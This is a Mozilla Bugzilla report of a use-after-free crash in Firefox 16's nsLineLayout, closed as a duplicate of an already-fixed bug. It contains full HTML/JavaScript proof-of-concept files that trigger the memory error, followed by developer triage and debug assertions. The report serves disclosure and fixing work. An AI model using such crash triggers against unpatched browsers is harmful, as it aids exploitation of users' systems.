Closed Bug 802991 Opened 12 years ago Closed 12 years ago

Use-after-free in nsLineLayout

Categories

(Core :: Layout, defect)

16 Branch
x86_64
Windows 7
defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 765409

People

(Reporter: abbGZcvu_bugzilla.mozilla.org, Unassigned)

Details

(Keywords: crash)

Attachments

(1 file)

551 bytes, application/octet-stream
Details
Attached file repro.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 Steps to reproduce: The below files trigger a use-after-free in Firefox 16.0.1, causing it to crash when tries to accesses data through a poisoned frame. frame.html can trigger the issue by itself, and repro.html is not required but does make it easier to trigger the access violation. --- repro.html --- <html xmlns="http://www.w3.org/1999/xhtml"> <body> <iframe src="frame.html"></iframe> </body> </html> --- frame.html --- <!DOCTYPE html> <fieldset><x dir="rtl"> <script id="y" type="text/javascript"> var oScriptElement = document.getElementById("y"); oScriptElement.parentNode.removeChild(oScriptElement); var oHtml = '<x>' + '<x id="x"></x>' + ' ' + '<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' + '<x>' + ' ' + '<x dir="ltr">'; document.write(oHtml); document.documentElement.offsetTop; var oElement = document.getElementById("x"); oElement.textContent = 'x'; </script> Actual results: Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame Expected results: No crash
Component: Untriaged → Layout
Product: Firefox → Core
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64, but not -aurora or trunk. Before the crash I got these assertions: ###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500 ###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210 ###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339 which points to bug 765409. After applying the patch there, the crash and assertions are gone. (The fix will land on -beta (Fx17) soon)
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Group: core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: